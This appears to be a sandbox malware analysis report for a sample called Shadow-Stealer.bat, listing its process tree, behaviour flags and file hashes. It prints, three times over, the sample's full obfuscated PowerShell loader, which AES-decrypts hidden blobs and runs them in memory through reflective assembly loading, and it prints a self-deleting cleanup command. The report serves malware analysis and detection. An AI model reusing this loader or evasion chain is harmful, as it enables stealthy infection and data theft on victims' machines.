C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{80bbc7d5-0111-463f-b649-8038ea64b44e}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{093674e6-d474-4d5d-9108-e374821f2f0b}5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & ATTRIB -h -s "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & del /f "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & exit5⤵
-
C:\Windows\system32\PING.EXEPING localhost -n 86⤵
- Runs ping.exe
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"6⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeATTRIB -h -s "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"6⤵
- Views/modifies file attributes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6676 /prefetch:83⤵
- NTFS ADS
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Shadow-Stealer.bat" "3⤵
-
C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{0dd0192d-dd8f-4392-9f8b-5dca309c3c58}5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\Shadow-Stealer.bat"2⤵
-
C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));3⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{9c278b0c-67f1-438c-8d20-f1d1faae9569}4⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{8a5775b4-0c43-41db-a226-0ea67b9f7285}4⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{e6c14402-cd06-4476-ae72-0aee4a527774}4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 1565⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & ATTRIB -h -s "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & del /f "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & exit4⤵
-
C:\Windows\system32\PING.EXEPING localhost -n 85⤵
- Runs ping.exe
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"5⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeATTRIB -h -s "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"5⤵
- Views/modifies file attributes
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Shadow-Stealer.bat2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 6604 -ip 66042⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 468 -p 7008 -ip 70082⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 688 -p 6108 -ip 61082⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 6260 -ip 62602⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 6056 -ip 60562⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\ProgramData\Microsoft\Windows\WER\Temp\WER.533636be-f85f-4ec7-bd5b-0d9c5b50edda.tmp.csv
  Filesize: 42KB
  MD5: 17029652ea9120d890f025b846f586bf
  SHA1: 8d8ef714792fc0e6f71f905295dc03bbd73fc36e
  SHA256: 793bfa45efb0db4e9b41a6393b2a950d66a72fb7a71637c3c47010beb11a0afa
  SHA512: 7386d0769c0cb89727a7d2aefbaed02349cbc0e40f91acffba108f24bee864df1ea10f596349d0a1b46f4cf52d1a2d430030524a6a50288b739c444700b248b2
- C:\ProgramData\Microsoft\Windows\WER\Temp\WER.89a2a5c3-6b8f-425f-864e-04a0dcff4a4b.tmp.txt
  Filesize: 13KB
  MD5: ab7af922bb41dd3935690b19783eb26c
  SHA1: ad0a092713fd9400be3bed0519c9f10ea12ebceb
  SHA256: db60c3dca0910df96f1266704723dbea70e537f82f6f944b2c59b3b829960843
  SHA512: 04d2af86e4ee476c53c79da2d62be893cf622c2c219f283b4d58e9fb1cc7f0743e722fa682bdb3c8c2cea9d2fd9cfc4b8f8dc1e47272711cde7119cac2ea2ce4
- C:\ProgramData\Microsoft\Windows\WER\Temp\WER.bfdc0f92-9444-41d2-9a3e-66379d1eaaf8.tmp.csv
  Filesize: 41KB
  MD5: 644830d5ae2523c9095228d6d6acf88c
  SHA1: 547cab9068438d582efd244c12a13c9ea0f6b39f
  SHA256: 70c6a616184c0ddc4db4389f355ad7f645a519b0b74939076f02cb102bb0aa78
  SHA512: a47bad64afe39497d92f12df76063e49ce1193a8b61d4203381140e220360214c7dfbbe1a7549bfbf6853c63eadccc68577688a62e2a6f44877c601dc61b20b4
- C:\ProgramData\Microsoft\Windows\WER\Temp\WER.d37b24ac-3403-4bf7-aa49-fd8b6a2aa58a.tmp.txt
  Filesize: 13KB
  MD5: 07f3e8f9effb289523a32be3951da7ee
  SHA1: 6ee9e17443b3ee765c027e6585967e04161d875f
  SHA256: f4506e5420b84c1e081b26190619c071445caceaaafa2be5324ad68b32719f30
  SHA512: af21b370c7a5a7d8b09c02c01705ca95ff335ef9e977f038da7697c447536503cc364b53f91d0caec2f8b4abcb533b91556109f10f1336caca5d2cbe9696aee4
- C:\ProgramData\Microsoft\Windows\WER\Temp\WER.d8652241-622d-4508-9a09-da436c34af3a.tmp.txt
  Filesize: 13KB
  MD5: 5039c1cdea9659d255897a1fe739f2cb
  SHA1: 0e3a68b1174e2e228e50a72787a5987eafc94642
  SHA256: 788063fe5b69ee5d917a38e9f464dba9e17aaa3c50f9493c9c3fd56ba7d1a2ba
  SHA512: 95e61ac4993cf0d64def5e0848fe65563d3190a7a3c5085f39a0c5e99e09212295b08be7e94603728ec657c828dd2e99bb043ae41c1eb7cbf9db3263971b895e
- C:\ProgramData\Microsoft\Windows\WER\Temp\WER.dd145f68-0ee5-405b-abda-1827dfe39a33.tmp.txt
  Filesize: 13KB
  MD5: bd85a748349d95fd9e89d2a520264384
  SHA1: 528ecd2fa32f014d84cd7a3f7c46c34785b86db7
  SHA256: 49853fcc7dd7160b3bc932da01cb6191de009cce16e94a3fd30274313a11407b
  SHA512: 3dfd1c5ad1774ab6f942f3e20119a83d4cc2aa659e795bbedb634f88dd081b2514f7ce5fefdb8a26695144c37eed9395a7876a66cd8f15e8c84eb4b55a2ec454
- C:\ProgramData\Microsoft\Windows\WER\Temp\WER.de215c06-3155-46f8-8318-255d1261d459.tmp.csv
  Filesize: 42KB
  MD5: ff5d52c50b73932c09c143c7c4c8765d
  SHA1: 235f7451b4a939b92533b4f74218bfec3be69260
  SHA256: 5ef56fe09209ae7e0a384dbeeaa875f2e72d24b7411efb2e8f97650e401e4e07
  SHA512: 50afb137d9a372be8dd1221a3a0514aabf6fc9750b6500632b5cc1c99d5c68c22ba1f400c92eda8429468aa4adabeab1a4fd5adf58859606e5cbfcb8ee0dc662
- C:\ProgramData\Microsoft\Windows\WER\Temp\WER.e60bf691-4917-45e0-a87b-3bc479c13f26.tmp.csv
  Filesize: 42KB
  MD5: 34d573a3f2a9e5d66ea8409ef14f8415
  SHA1: fadbef7c0cc09ecd9de7cd2c0b54bf3e41fa6657
  SHA256: 6c6929277d5fc9bda564c71ca62fdc40a191b7c99370311264306f0b57799014
  SHA512: 9796f31282c7df3ce3997332b25b80a929a653e6c4a011145ca6beb709d48b1a7deb21c0a424bc889045fa5aa84324c631caaa969176fb05b8543a160d451247
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Shadow-Stealer.bat.exe.log
  Filesize: 3KB
  MD5: 918925b4ffb522c4188485a5e84ab6ed
  SHA1: f53ee7bacfae671d898075778f668cbf727c5d5e
  SHA256: 18d5722b4bdd546da121b4c8756096755cab8cb7c40126d93644910d9292f343
  SHA512: 82d4b87cc804c393a5c812a4dc327743ae928a44f8fd52902410ba43dfae738254e94437b0482c86a93dea416fcb87a34ed892f8541c7508545b3c98dfd4d8ea
- C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
  Filesize: 152B
  MD5: f717f56b5d8e2e057c440a5a81043662
  SHA1: 0ad6c9bbd28dab5c9664bad04db95fd50db36b3f
  SHA256: 4286cd3f23251d0a607e47eccb5e0f4af8542d38b32879d2db2ab7f4e6031945
  SHA512: 61e263935d51028ec0aab51b938b880945a950cec9635a0dafddf795658ea0a2dfcf9cfc0cab5459b659bb7204347b047a5c6b924fabea44ce389b1cbb9867d6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5196eaa9f7a574c29bd419f9d8c2d9349
SHA119982d15d1e2688903b0a3e53a8517ab537b68ed
SHA256df1e96677bcfffe5044826aa14a11e85ef2ebb014ee9e890e723a14dc5f31412
SHA512e066d74da36a459c19db30e68b703ec9f92019f2d5f24fd476a5fd3653c0b453871e2c08cdc47f2b4d4c4be19ff99e6ef3956d93b2d7d0a69645577d44125ac7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000016Filesize
118KB
MD58907aef87f7d901c97d6c3699fd8d1a6
SHA1a3429685ca3bb031738858e86f72a74698c147a7
SHA2569b4f6d5162b94e469fa6467a9a9a5186c8abf1e42358b9bf9dd0900744e57909
SHA51293d0df9549197304ead7baf299a308f7b1fded1cc3dc9b1354fb46f777504e71f9d0cb05aa38d151e7aa4feed0ee35a0e46acddab29607b80eb39ad27b4cae18
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
2KB
MD525a26b8c3416b8b9aa406bd4bbadfb5e
SHA1677fdf250c5fddef5aa8827e9d2f7debfe475210
SHA256dba247f47aa1164dc25aac7cc0a169b6a43f6e4fc02bf58ddef168dad445195d
SHA512246fafea4d7e603bfafb5654bef35e7c9308cd2ac22ef932db0ad56853d06ec4a56f76f45049f85057ecf55d433d21695c4b670dc66cf2b2048f6897cb30ea95
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
2KB
MD5a00aa49bb4262c5879ee124ba663df57
SHA102f8d07236b1cd07bb2dd5c901953bc4de92e515
SHA256bbf33658bf92ed5ef5016ea206b043a80c85d1a5e38c037e03241b8841edce3c
SHA512dbda6588290e474a716e1d5bb6e55da4b76c2d1b890e9cee99993aacbf8a357d8163bbb2f58762c0121addffafe9a8fb653ef4430a18429d6df430749ce0fc1e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
2KB
MD5ab1b300fa63bfbdda59a6813bbfba12a
SHA1b7c7293715563b202c6e668d648e20eeda0af56e
SHA256586d0230343f60f7cbf9afff6a86c1c572d0edcaef8e34de5f3bd0c1ec7a394f
SHA512c925ce7b1334a3de6a2653c90411ae452ccefda8598e86b18c5a0e8067534dbbae31e4d9e027cf64a0f9f670daa9d71e3fa8df1cb09e6792ccc1cad7ca661f3b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
595B
MD555c1f7bff501bd7f6baed810c9833671
SHA103df557ee6275d32f80932bd9639435ba31aa3c8
SHA25695d61c2bcb097ab5caca96f244252bc8eda212ca1bf839804ce8598a3eeae34b
SHA512ad3416ec54f4d763dcf033a30a8fa840e68dd449d52250073ab163c8e83e012a0afb386a195db8129e83512d6c81c58cf62bf6279ca7dbe350b1ba452d7eea0b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
678B
MD583f65a45c1824322e468923d39173c05
SHA1c30ba81c98d4f3b67d23791db398b3c82a6d0a24
SHA2561ee1f2fa5ef47193e6a59f4743aff91ab81fbca43292487ce85623f6d18b2ed0
SHA512c44da4b2ce7e639e8e3090adf47bf9451b8df3e08e83020a60f1cc0f5bd7a3bf2ffde4b0c700443e97280a59e9067cedd3f999e541844ffab3adbd9b887c91d4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD53bcc13187882f005db214ab25d0eab74
SHA1919c17017b8b47ea4bfbba0663fdeb44ec38c29f
SHA25633ed20bc29940106a6d31d04b30e259bdaa1b678de1e682d5187fabfb8114268
SHA51204179203414f30a18fbf0189ba2c56cf034358b023ba222c92456db187823a673f68edf786a4cf37f88c1f9a4622cb7668dfc704bb4eb7e25e21b02a8ee45abd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5fa3a7032933b32ca8b677d09b040c2b0
SHA16269bedacd552e160b98d3ed9721c2812afe7b25
SHA2565dd361d462b1868c18678e756399d74459a0ff6612de2bcdf8c4c4bdadf1c9b4
SHA512f6221a13d39d190ac6a7cdf170434f1ae90a346bf3da94f6974dce3a07f3f20e782d8cc98afd01c7365a46099426abe7654b8604bc51f3e96df0297325371abe
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5f457fbc37da6a68130e0cecbcd69b158
SHA12243d8d629ef73850ff5742e7b51082249aa3067
SHA2565e91369a05af44d86d6eee026665adbeca35ace3f7a4c05ed9e3d9c2a1ab0e14
SHA512f82d8a58f1edd850518abb9ff8bae1437a7f019b68433c266162eac18305a9627c9b0d201277234dfe99647417e89f785b214f66d1d9b59d9548b9f974991cf5
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD5ab0fa8c162b50d19c1e9ac97b33f967d
SHA116647ab0147882f8b8fec806127593031feb6c2f
SHA256fc49db963109394857b1c7c6dc60b1c54814cbfc63e4609a2a57df75f65ced77
SHA512d3e8aa27cd2625094d15b3e829cca61b870166c43b68f6866e3ae99318b029bbdedeaba7822b2597a1cd1b2002ca6542928e3456a075723fca05f4d276b89e8e
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD5f5560b8904dd237e0e0e2983446b3284
SHA1376ad60d6bc80d8dd2d94cf60fe40bb9f1372158
SHA25644c8953d7b9ddae995510c82660b0e40ad41c41af7ca56d2cfcbed31938b4efa
SHA5127c702ff10990aa5e6b3516ef3cd12fe26f6fac8370f70bda779da44596450e6c348e3d9b63af6d92a25cc3959baa9a9a0164de0833a9acbc6d2f88fcd2864730
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD5fb737b6623c55f9db4ab17816fa30ea7
SHA1c8f8fb40d993011349207d36ca153e7644bce98c
SHA256ea0dd01e51c4d7a53ff9d302d62631627eda9aff08f5356a042c17a9e5236253
SHA512631fbd38c744e797f9fa4988a5034671a10cc1e29240c44a488914e76da0e16a6d689b0bc6ffaf169b22e5f946705e403092881c5b1088cdad724a25656d28fe
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD51d37976e2f77224b54c49e9602a54e61
SHA12853a336e0bc7d6c38b09f870b14277535cb86fb
SHA256ce6f42953a1c8119e2ee5c9bc8055121bf68434fbca9467d97c4ef3496f31f1a
SHA5128c6249f4afb63568808da22a9640f74e26a41f1ee6210f9cba856fab2db6f928c2ee2c5c9048ec711c7f79c3905f3eaa054f83ad17f294dec8b381cb48170979
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
1KB
MD5425aeb08ff28ca5ded65df5c80c131b7
SHA1c8a40c146aab4574114a24a5e3a186edc87a125a
SHA256442a3bd6a90d5c1e49f1825d9cd334afb1170ad6ce91b85f50b87d040183f5de
SHA512aba711c5df799aa4b9b3425d68cddd254230d1be2a3317532c88bfb4dfc7d4bddce5515a7b1bdf53f41e88eda3fe35b30b9eed828270ef1ace850544e671278a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe58c4e1.TMPFilesize
1KB
MD5a9e094bfe837ef97fdd6c2636c0f2209
SHA1b46e767c5c7ed1f01c28ebde78b9f17623358526
SHA256bcd90ccdb697dd1292a1a6375c31632334ceb1e32ac6e73b99277414d4bfe59a
SHA5122953bb6581d07f0e39a7c807cb4a68dc2060092f03369dffdeb76860d6e7991700ed2164072bd7e83f33d38ab3273d3df33fed67a7a0ce395b375a44aa009f78
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\blob_storage\ab2c1477-c56b-40e8-9ce6-6f51ba6306d2\1Filesize
7.5MB
MD56fe3f151cbe46134da5c593e99364851
SHA1d33d6727f1ea7eb5e2c74bcfa994f2743a1505fc
SHA2567851ea0840116de2ef9bcc682f1e67f81cdb713c13ef6797c22fbd17e5f7ea2d
SHA512d10017c8fa3140082cd8f174d2bb4597bac18a465c42ce7eb1b6ce6b79d153c5cbab632fe4bb15e28ebd288073ab504b317dc7a50553b5701782e19ac4338986
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
